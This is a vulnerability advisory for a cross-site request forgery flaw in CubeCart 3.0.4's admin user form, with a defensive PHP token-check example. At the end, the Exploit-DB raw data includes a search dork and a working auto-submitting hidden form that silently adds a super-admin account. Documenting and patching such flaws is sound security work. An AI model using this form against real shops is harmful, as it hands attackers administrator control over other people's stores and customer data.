Vendor: CubeCart
By: P0C T34M
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery (CSRF))
Product Name: CubeCart
Affected Version From: 3.0.4
Affected Version To: 3.0.4
Patch Exists: NO
Related CWE: N/A
CPE: a:cubecart:cubecart:3.0.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

CubeCart 3.0.4 <= CSRF Add Admin

CubeCart 3.0.4 is vulnerable to Cross-Site Request Forgery (CSRF), which allows an attacker to add an administrator account to the application. The admin "add user" form is accepted without any anti-CSRF token, so an attacker can craft a malicious HTML page containing a form with hidden fields that is submitted to the vulnerable application by the browser of an administrator who visits that page. This adds an admin user without the administrator's knowledge or consent. This vulnerability was discovered by P0C T34M in 2010.

Mitigation:

The application should bind every state-changing request to an unpredictable, per-session CSRF token and reject any request whose token is missing or does not match, so that a form submitted from a third-party page cannot be accepted as a legitimate admin action.
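The following is an added example of the mitigation described above; it is not CubeCart code and the function names, session keys and request handling around administrators.php are assumptions. It shows the synchronizer-token pattern: a random per-session token is embedded as a hidden field in the admin form, the POST handler compares it in constant time, and the session cookie is issued with SameSite so that a cross-site form post does not carry the admin session in the first place. A Fetch Metadata / Origin check is included as a second layer.

```php
<?php
// Added example (not CubeCart's own code): CSRF protection for an admin
// "add user" form. Names below are hypothetical.
declare(strict_types=1);

const CSRF_SESSION_KEY = 'csrf_token';
const CSRF_FIELD_NAME  = 'csrf_token';

/** Start the session with cookie attributes that limit cross-site sending. */
function start_secure_session(): void
{
    if (session_status() === PHP_SESSION_ACTIVE) {
        return;
    }
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,   // assumes the admin panel is served over HTTPS
        'samesite' => 'Lax',  // browser drops the cookie on cross-site POSTs
    ]);
    session_start();
}

/** Return the per-session token, creating it on first use. */
function csrf_token(): string
{
    start_secure_session();
    if (empty($_SESSION[CSRF_SESSION_KEY])) {
        // 32 CSPRNG bytes: a page on another origin cannot read or guess this.
        $_SESSION[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $_SESSION[CSRF_SESSION_KEY];
}

/** Hidden input to embed in every state-changing form. */
function csrf_field(): string
{
    return '<input type="hidden" name="' . CSRF_FIELD_NAME . '" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

/** Validate a submitted token against the session copy (constant-time). */
function csrf_check(array $post, string $sessionToken): bool
{
    $submitted = $post[CSRF_FIELD_NAME] ?? '';
    if (!is_string($submitted) || $submitted === '' || $sessionToken === '') {
        return false;
    }
    return hash_equals($sessionToken, $submitted);
}

/** Second layer: reject requests the browser reports as cross-site. */
function same_origin_request(array $server, string $expectedHost): bool
{
    if (isset($server['HTTP_SEC_FETCH_SITE'])) {
        return $server['HTTP_SEC_FETCH_SITE'] === 'same-origin';
    }
    if (isset($server['HTTP_ORIGIN'])) {
        return parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST) === $expectedHost;
    }
    return false; // no signal at all: fail closed for state-changing requests
}

// --- hypothetical handler for administrators.php?mode=new ---
start_secure_session();
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $ok = csrf_check($_POST, $_SESSION[CSRF_SESSION_KEY] ?? '')
        && same_origin_request($_SERVER, $_SERVER['HTTP_HOST'] ?? '');
    if (!$ok) {
        http_response_code(403);
        // Log it: repeated failures here are a useful CSRF-attempt signal.
        error_log('CSRF check failed for admin user creation from '
            . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
        exit('Invalid request');
    }
    // Token and origin verified: proceed to create the administrator here.
} else {
    // Render the form with the token; field names follow the page's form.
    echo '<form method="post" action="administrators.php?mode=new">'
        . csrf_field()
        . '<input name="adminUsername">'
        . '<input name="adminPassword" type="password">'
        . '<button type="submit">Add User</button>'
        . '</form>';
}
```

The token check alone is sufficient to stop the auto-submitting form shown below, because the attacker's page cannot read the victim's session token. The SameSite cookie attribute and the Sec-Fetch-Site/Origin check are defence in depth for the case where a token check is accidentally omitted from one handler.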

Exploit-DB raw data:

#Title    : CubeCart 3.0.4 <= CSRF Add Admin
#Script   : CubeCart 3.0.4
#Language : Php
#Download : http://www.cubecart.com/
#Date     : 2010/12/24
#Version  : 3.0.4
#Dork     : "Powered by CubeCart 3.0.4"
#Found    : by P0C T34M >> tnt-r00t 
#Homepage : www.p0c.cc


<form name="p0c" action="http://127.0.0.1/cc/admin/adminusers/administrators.php?mode=new" method="post">
    <input name="name" type="hidden" value="myname" />
    <input name="adminUsername" type="hidden" value="r00t" />
    <input name="email" type="hidden" value="myemail@hotmail.com" />
    <input name="adminPassword" type="hidden" value="t00r" />
    <input name="isSuper" type="hidden" value="1" />
    <input name="adminId" type="hidden" value="" />
    <input name="Submit" type="hidden" class="submit" value="Add User" />
</form>
<script>document.p0c.submit();</script>

NICKNAME: P0C T34M